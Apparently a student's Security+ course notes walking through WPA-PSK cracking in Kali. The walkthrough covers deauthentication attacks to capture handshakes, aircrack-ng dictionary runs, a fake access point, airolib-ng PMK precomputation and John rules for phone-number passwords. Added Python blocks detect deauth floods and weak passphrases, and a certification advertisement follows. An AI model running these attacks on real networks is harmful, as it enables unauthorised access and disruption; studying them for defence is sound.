
[Aqniu (安全牛) Study Notes] WPA Attacks

Tags: information security, WPA, Security+

WPA PSK attacks

There is only one way to recover the password:
- WPA does not share WEP's weaknesses
- the only option is brute force, and its cost is set by
  - CPU resources
  - time
  - dictionary quality

Dictionary sources:
- dictionaries shared online
- leaked passwords
- regional phone number ranges
- dictionaries generated with Crunch
- dictionary files bundled with Kali

WPA PSK attacks

PSK cracking process:
1. Start monitor mode
2. Start capturing packets and save them to a file
3. Deauthentication attack to obtain the 4-way handshake
4. Brute-force with a dictionary

root@kali:~# service network-manager stop

root@kali:~# airmon-ng check kill
Killing these processes:

PID Name
989 wpa_supplicant
1025 dhclient

root@kali:~# airmon-ng start wlan0
No interfering processes found

PHY Interface Driver Chipset

phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 monitor mode vif enabled for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)

root@kali:~# iwconfig
eth0 no wireless extensions.

wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.

root@kali:~# airodump-ng wlan0mon   // scan for the target network

root@kali:~# airodump-ng wlan0mon --bssid EC:25:CA:DC:29:B6 -c 11 -w wpa   // lock to channel 11 and save the capture as wpa-*.cap

root@kali:~# aireplay-ng -0 2 -a EC:25:CA:DC:29:B6 -c 50:3E:34:30:0F:AA wlan0mon   // two deauth bursts; the client re-associates and the handshake is captured

root@kali:~# ls
wpa-01.cap wpa-01.csv wpa-01.kismet.csv wpa-01.kismet.netxml

root@kali:~# ls wpa*
wpa-01.cap wpa-01.csv wpa-01.kismet.csv wpa-01.kismet.netxml

root@kali:~# cd /usr/share/john/   // dictionary directory

root@kali:/usr/share/john# ls password.lst

root@kali:/usr/share/john# more password.lst

root@kali:/usr/share/john# grep Password password.lst
Password

root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
The password is Password
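The deauthentication burst above is what makes the handshake capturable: the client is kicked off and re-associates while airodump-ng is listening. From the defender's side that same burst is the thing to look for. The Python below is an added example written for these notes, not part of the original post or of the aircrack-ng suite: it runs a sliding-window counter over a constructed list of decoded 802.11 management frames (the dict keys t/type/subtype/src/dst are this example's own convention, not a library format) and raises one alert when a single source floods a single destination with deauthentication or disassociation frames. The BSSID and client address reuse the values from the transcript.

```python
from collections import defaultdict, deque

# IEEE 802.11 management frame (type 0) subtypes that kick a station off
DEAUTH_SUBTYPE = 0x0C    # Deauthentication
DISASSOC_SUBTYPE = 0x0A  # Disassociation (treated the same way)
WINDOW_SECONDS = 2.0     # sliding window length
THRESHOLD = 5            # frames per (src, dst) pair inside the window that count as a flood

AP = "EC:25:CA:DC:29:B6"      # BSSID from the notes
CLIENT = "50:3E:34:30:0F:AA"  # client station from the notes


def detect_deauth_flood(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return one alert (src, dst, time_of_first_trigger) per flooding pair.

    frames: iterable of dicts sorted by time with keys
            t (seconds), type (0 = management), subtype, src, dst
    """
    recent = defaultdict(deque)  # (src, dst) -> timestamps still inside the window
    alerts, already = [], set()
    for f in frames:
        if f["type"] != 0 or f["subtype"] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        key = (f["src"].lower(), f["dst"].lower())
        q = recent[key]
        q.append(f["t"])
        while q and f["t"] - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in already:
            already.add(key)
            alerts.append((key[0], key[1], f["t"]))
    return alerts


def constructed_capture():
    """Constructed sample: 20 beacons, one isolated deauth (normal), then a
    10-frame burst spoofed from the AP to the client, the pattern a
    deauthentication tool produces."""
    frames = [{"t": round(0.1 * i, 1), "type": 0, "subtype": 0x08,  # beacons
               "src": AP, "dst": "ff:ff:ff:ff:ff:ff"} for i in range(20)]
    frames.append({"t": 0.35, "type": 0, "subtype": DEAUTH_SUBTYPE, "src": AP, "dst": CLIENT})
    frames += [{"t": round(5.0 + 0.1 * i, 1), "type": 0, "subtype": DEAUTH_SUBTYPE,
                "src": AP, "dst": CLIENT} for i in range(10)]
    return sorted(frames, key=lambda f: f["t"])


if __name__ == "__main__":
    for src, dst, t in detect_deauth_flood(constructed_capture()):
        print(f"deauth flood from {src} to {dst}, first seen at t={t}s")
```

The window and threshold are tuning knobs: a handful of deauth frames is normal (an AP rebooting, a client roaming), whereas the tool in the transcript sends 64 frames per burst in each direction, so even a conservative threshold separates the two. The durable mitigation is 802.11w Protected Management Frames, which authenticate deauthentication and disassociation frames so that a spoofed one is discarded by the client; WPA3 makes PMF mandatory.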

root@kali:~# cd /usr/share/wfuzz/wordlist/
fuzzdb/ general/ Injections/ others/ stress/ vulns/ webservices/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/
attack-payloads/ dbcs/ web-backdoors/ wordlists-user-passwd/
Discovery/ regex/ wordlists-misc/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-
wordlists-misc/ wordlists-user-passwd/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls
common-http-ports.txt us_cities.txt wordlist-alphanumeric-case.txt wordlist-common-snmp-community-strings.txt wordlist-dns.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..

root@kali:/usr/share/wfuzz/wordlist/fuzzdb# cd wordlists-user-passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd# cd passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwd# ls
john.txt phpbb.txt twitter.txt weaksauce.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwd# cat john.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwd# cat phpbb.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwd# cd

root@kali:~# cd /usr/share/

root@kali:/usr/share# ls

root@kali:/usr/share# cd wordlists/

root@kali:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l
-rw-r--r-- 1 root root 53357341 3月 3 2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l -h
-rw-r--r-- 1 root root 51M 3月 3 2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz

root@kali:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt sqlmap.txt termineter.txt wfuzz

root@kali:/usr/share/wordlists# cat rockyou.txt | wc -l
14344392

root@kali:/usr/share/wordlists# aircrack-ng -w rockyou.txt /root/wpa-01.cap
The password is password

root@kali:~# airodump-ng --essid kifi wlan0mon

root@kali:~# airodump-ng --bssid EC:26:CA:DC:29:B5 -c 11 wlan0mon -w wpa

root@kali:~# ls
wpa-01.cap wpa-01.csv wpa-01.kismet.csv wpa-01.kismet.netxml wpa-02.cap wpa-02.csv wpa-02.kismet.csv wpa-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

root@kali:~# grep Password135 /usr/share/wordlists/rockyou.txt

WPA PSK attacks

WPA password cracking without the real AP (client side only):
1. Start monitor mode
2. Start capturing packets and save them
3. Forge an AP with the same ESSID, taken from the clients' probe requests
4. Capture the first two packets of the 4-way handshake
5. Brute-force with a dictionary

root@kali:~# airodump-ng wlan0mon

root@kali:~# rm wpa-01.*

root@kali:~# airodump-ng wlan0mon

root@kali:~# airbase-ng -h
Usage: airbase-ng <options> <replay interface>

Options:

-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to encrypt/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages) (long --verbose)
-M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)
-A : Ad-Hoc Mode (allows other clients to peer) (long --ad-hoc)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID (long --hidden)
-s : force shared key authentication
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte attack (long --caffe-latte)
-N : Hirte attack (cfrag attack), creates arp request against wep client (long --cfrag)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)

Filter options:

--bssid <MAC> : BSSID to filter/use (short -b)
--bssids <file> : read a list of BSSIDs out of that file (short -B)
--client <MAC> : MAC of client to accept (short -d)
--clients <file> : read a list of MACs out of that file (short -D)
--essid <ESSID> : specify a single ESSID (short -e)
--essids <file> : read a list of ESSIDs out of that file (short -E)

Help:

--help: Displays the usage screen (short -H)

root@kali:~# airbase-ng --essid lcon -c 11 wlan0mon   // fake AP
18:44:04 Created tap interface at0
18:44:04 Trying to set MTU on at0 to 1500
18:44:04 Trying to set MTU on wlan0mon to 1800
18:44:04 Access point with BSSID C8:3A:35:CA:46:91 started.

root@kali:~# tmux   // split the screen

root@kali:~# airbase-ng --essid kifi -c 11 wlan0mon

root@kali:~# airbase-ng --essid kifi -c 11 -z 2 wlan0mon   // advertise WPA1 with TKIP

root@kali:~# airbase-ng --essid kifi -c 11 -Z 4 wlan0mon   // advertise WPA2 with CCMP

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --essid kifi

root@kali:~# airodump-ng wlan0mon --essid kifi -w wpa

root@kali:~# airodump-ng wlan0mon --essid kifi -w wpa -c 11

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0
wpa-01.cap wpa-01.csv wpa-01.kismet.csv wpa-01.kismet.netxml wpa-02.cap wpa-02.csv wpa-02.kismet.csv wpa-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

AIROLIB password cracking

- Designed to store ESSIDs and password lists
- Precomputes the PMK, which never changes for a given ESSID and passphrase (this is the computationally expensive part)
- During cracking the stored PMK is used to compute the PTK (fast, low computational cost)
- The password is identified by checking the handshake's integrity digest (MIC)
- Data is stored in an SQLite3 database

AIROLIB password cracking

echo kifi > essid.txt

airolib-ng db --import essid essid.txt

airolib-ng db --stats

airolib-ng db --import passwd <wordlist>   // entries that are not valid WPA passphrases are discarded automatically

airolib-ng db --batch   // generates the PMKs

aircrack-ng -r db wpa.cap

root@kali:~# echo kifi > essid.txt

root@kali:~# cat essid.txt
kifi

root@kali:~# airolib-ng db --import essid essid.txt

root@kali:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database, 0 out of 0 possible combinations have been computed (0%)

ESSID Priority Done
kifi 64 (null)

root@kali:~# airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt

root@kali:~# airolib-ng db --import passwd /usr/share/john/password.lst

root@kali:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database, 0 out of 0 possible combinations have been computed (0%)

ESSID Priority Done
kifi 64 0.0

root@kali:~# airolib-ng db --batch
Computed 652 PMK in 14 seconds (46 PMK/s, 0 in buffer). All ESSID processed.

root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets

# BSSID ESSID Encryption

1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc2

root@kali:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt

root@kali:~# more dict.txt

root@kali:~# airolib-ng db --import passwd dict.txt
Reading file
Writing... as read, 121538 invalid lines ignored.
Done

root@kali:~# airolib-ng db --batch

JTR password cracking

John the Ripper
- a fast password cracker
- supports rule-based expansion of a password dictionary
- many people use their mobile phone number as the wireless password
- obtain the number prefixes and use a JTR rule to append the last few digits
- configuration file: /etc/john/john.conf

[List.Rules:Wordlist]

$[0-9]$[0-9]$[0-9]

root@kali:~# gedit

root@kali:~# top   // check system load

root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets

# BSSID ESSID Encryption

1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc2

root@kali:~# cat yd.txt

root@kali:~# vi /etc/john/john.conf
/List.Rules:Wordlist   // jump to the wordlist rules section
Append the password rule at the end of that section:
$[0-9]$[0-9]$[0-9]

JTR password cracking

Testing the rule:

john --wordlist=password.lst --rules --stdout | grep -i Password123

Invocation for cracking:

john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w - wpa.cap

Cracking a Beijing Unicom mobile-number password

root@kali:~# john --wordlist=yd.txt --rules --stdout

root@kali:~# ls yd.txt -lh
-rw-r--r-- 1 root root 561 11月 10 19:57 yd.txt

root@kali:~# john --wordlist=yd.txt --rules --stdout | aircrack-ng -e kifi -w - wpa-02.cap
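The rule above works because the weak passphrase classes these notes target are tiny keyspaces: a 561-byte prefix file expanded by three $[0-9] rules is only a thousand candidates per prefix, and a dictionary word with a few digits appended is the same word from the cracker's point of view. A defender can reject those classes at the point where the PSK is chosen. The Python below is an added example written for these notes (it is not John the Ripper's or aircrack-ng's code): weakness_reasons() applies the inverse of the john.conf rule, stripping up to three trailing digits and comparing the stem against a constructed blocklist, flags all-digit and 11-digit mobile-number-shaped values, and keyspace_for_rule() does the arithmetic for a prefix list expanded by $[0-9] rules. The blocklist and the sample number are constructed.

```python
import re

# Constructed blocklist standing in for a real leaked-password file
BLOCKLIST = {"password", "qwerty", "letmein", "iloveyou", "123456"}

# Inverse of the john.conf rule "$[0-9]$[0-9]$[0-9]": up to three appended digits
TRAILING_DIGITS = re.compile(r"\d{1,3}$")
# Shape of a Chinese mobile number: 11 digits beginning with 1 (shape only)
MOBILE_SHAPE = re.compile(r"^1\d{10}$")


def weakness_reasons(passphrase, blocklist=BLOCKLIST):
    """Return the reasons a WPA passphrase falls into one of the weak classes
    described in these notes. An empty list means no checked class applies."""
    reasons = []
    if not 8 <= len(passphrase) <= 63:
        reasons.append("length outside 8-63 characters")
    if passphrase.isdigit():
        reasons.append("digits only")
    if MOBILE_SHAPE.match(passphrase):
        reasons.append("shaped like an 11-digit mobile number")
    stem = TRAILING_DIGITS.sub("", passphrase).lower()
    if stem in blocklist:
        reasons.append("blocklisted word with up to three trailing digits")
    return reasons


def keyspace_for_rule(prefix_count, appended_digits):
    """Candidates produced when each prefix is expanded by N $[0-9] rules."""
    return prefix_count * 10 ** appended_digits


if __name__ == "__main__":
    for candidate in ["Password123", "13912345678", "qwerty", "correct horse battery staple"]:
        print(candidate, "->", weakness_reasons(candidate) or ["no weak class matched"])
    # 50 eight-digit prefixes with three appended digits is only 50,000 guesses
    print("keyspace for 50 prefixes x 3 digits:", keyspace_for_rule(50, 3))
```

The check is deliberately structural rather than exhaustive: it catches the two classes the transcript exploits (phone numbers and list words with trailing digits) so that a router provisioning script or a policy document can refuse them, and it composes with a real breached-password list by swapping in that list for BLOCKLIST.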

These notes were written by a student of the 安全牛 classroom; to see the course or more information-security material, head over to 安全牛課堂.

Why is Security+ the hottest certification of the Internet+ era?

First, 牛妹 introduces Security+.

The Security+ certification is a vendor-neutral third-party certification issued by CompTIA, the Computing Technology Industry Association of the United States. Together with CISSP, ITIL and others it is one of the ten most popular certifications in the international IT industry. Compared with CISSP, which emphasizes information security management, Security+ focuses on information security technology and operations.

Passing the certification demonstrates competence in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and cryptography. Because the exam is not easy and the certification carries real weight, it has been widely adopted by enterprises and security professionals worldwide.

Why is the Security+ certification so popular?

Reason one: among all information security certifications, those focused on security technology are missing, and Security+ fills exactly that gap.

The information security certifications currently recognized in the industry are mainly CISP and CISSP, but both lean towards information security management; technical knowledge is covered broadly and shallowly and the exams only touch on it in passing. Moreover, CISSP requires more than five years of information security work experience, and CISP requires a college diploma plus four years of work experience. These requirements undoubtedly block capable and ambitious young people from obtaining a certification. In real life, whether you are job hunting, seeking a promotion or a raise, or listing staff in a tender, certifications are indispensable, and this puts young people at a great disadvantage. Security+ clears these obstacles from young people's career paths: because it focuses on security technology, it has no special work-experience requirement. As long as you have an IT-related background and want to advance, you can study for and take the exam.

Reason two: a powerful tool for IT operations staff to do their jobs and get ahead.

In banking, securities, insurance, information and communications and similar industries there are many IT operations staff, and the work covers a very wide area: it is a comprehensive technical role spanning networks, systems, security, application architecture and storage. It may lack the tragic heroism of programmers' "live as a bachelor, die writing code", but it has its own lament of "hoeing at noon is nothing next to the misery of ops". Facing computers and machines every day, confusion about career development is hard to avoid over time. The Security+ international certification lets ambitious IT operations staff learn network security knowledge and master network security practice, steering their careers toward network security and helping to relieve the domestic shortage of information security talent. And even without changing roles, learning security and obtaining a security certification is essential to doing operations work well.

Reason three: practical, international, convenient to sit, and moderately priced!

As the most influential leading body in the global ICT field, CompTIA is professional, fair and impartial in certifying information security talent. Security+ is operations-oriented and closely tied to the daily work of front-line engineers, making it suitable for IT staff in banks, securities firms, insurers and Internet companies. As an international certification it is widely recognized in 147 countries worldwide.

In the current wave of information security, talent is the key to its development. Domestic information security talent is in very short supply, and we believe Security+ will become the hottest information security certification.

This article is from the "11662938" blog; please keep this source: http://11672938.blog.51cto.com/11662938/1967653
